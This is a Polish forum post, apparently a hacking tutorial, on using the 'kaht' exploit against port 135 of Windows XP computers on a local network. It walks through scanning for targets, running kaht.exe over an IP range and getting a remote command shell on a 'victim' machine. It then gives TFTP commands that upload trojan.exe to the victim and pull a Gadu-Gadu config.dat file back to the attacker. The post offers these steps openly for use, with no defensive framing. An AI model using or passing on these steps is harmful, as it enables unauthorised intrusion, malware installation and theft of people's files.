* 1. Kaht jest to exploit dzieki któremu możemy dostać sie do komputera w sieci lan exploit ten działa na porcie 135
aby zadziałał ofiara musi mieć wyłączonego firewalla
obecnie najnowsza versja kahta to kaht3
* 2. obsługa
dobrze zaopatrzyć sie w skaner portu 135 "Retina scanner" pozwala on wszukać komputery które mają otwarty ten port.
Nastepnie kopiujemy kahta na dysk otwieramy linie msdos Start/uruchom wpisujemy cmd wyszukujemy sciezke do naszego kahta
i piszemy przykład: kaht.exe 192.168.1.1 192.168.1.255
nasz program zacznie przeszukiwać grupe komputerów w sieci o ip z końcówkami od 1 - 255
i wyświetli cos takiego
- Connecting to 192.168.1.01
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.1.02
Sending Exploit to a [WinXP] Server...FAILED
- Connecting to 192.168.1.03
Sending Exploit to a [WinXP] Server...FAILED
jeśli znajdzie komputer z otwartym portem to wyświetli
- Connecting to 192.168.1.221 Sending Exploit to a [WinXP] Server...
Microsoft Windows XP [Wersja 5.1.2600]
(c) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
i w tym momencie jesteśmy na komputerze ofiary na dysku c:\WINDOWS\system32\
komendy cmd mozesz znaleźc wpisując help lub na mojej stronie [link widoczny dla zalogowanych]
aby jednak skopiować od ofiary plik
należy sie zaopatrzyć w kolejny program o nazwie : tftpd32
* 3. obsługa tftpd32
wciskamy "settings" pojawia nam sie ekran z ustawieniami. W base directory wybieramy jakis folder. Jest to folder serwera TFTP bedizemy umieszczac tam pliki ktore chcemy wyslac do ofiary, oraz beda tak znajdowac sie pliki ktore sciagniemy od ofiary. U mnie jest to C:\tftp Teraz wrzucam do tego folderu jakis plik ktory będę chciał skopiować na komputer ofiary. Powiedzmy ze jest to plik: trojan.exe Aby skopiować jakis plik od ofiary, albo wgrac mu jakis plik na twardy potrzebna bedize nam komenda TFTP
aby wgrać komuś jakis plik na twardy piszemy:
TFTP -i [swoje IP] GET [nazwa pliku ktory chcemy skopiowac musi on sie znajdowac w folderze serwera TFTP u mnie jest to C:\tftp] [nazwa jaka ma miec plik na komputerze ofiary] czyli w naszym przypadku jak chcemy skopiowac ofiarze plik trojan.exe to piszemy:
TFTP -i 192.168.1.221 GET trojan.exe C:\windows\trojan.exe
Jak chcemy od kogoś skopiować jakiś plik wtedy używamy tej samej komendy tylko piszemy troche inaczej
TFTP -i [swoje IP] PUT [sciezke do pliku ktory chcemy skopiowac] [nazwa juz skopiowanego pliku] teraz w praktyce wykorzystamy to:
TFTP -i 192.168.0.23 PUT C:\gadu-gadu\users\lamer\config.dat config.dat i w rezultacie w folderze C:\tftp pojawił nam sie plik config.dat Oczywiście caly czas musimy miec w tle odpalony program tftpd32
Nie możesz pisać nowych tematów Nie możesz odpowiadać w tematach Nie możesz zmieniać swoich postów Nie możesz usuwać swoich postów Nie możesz głosować w ankietach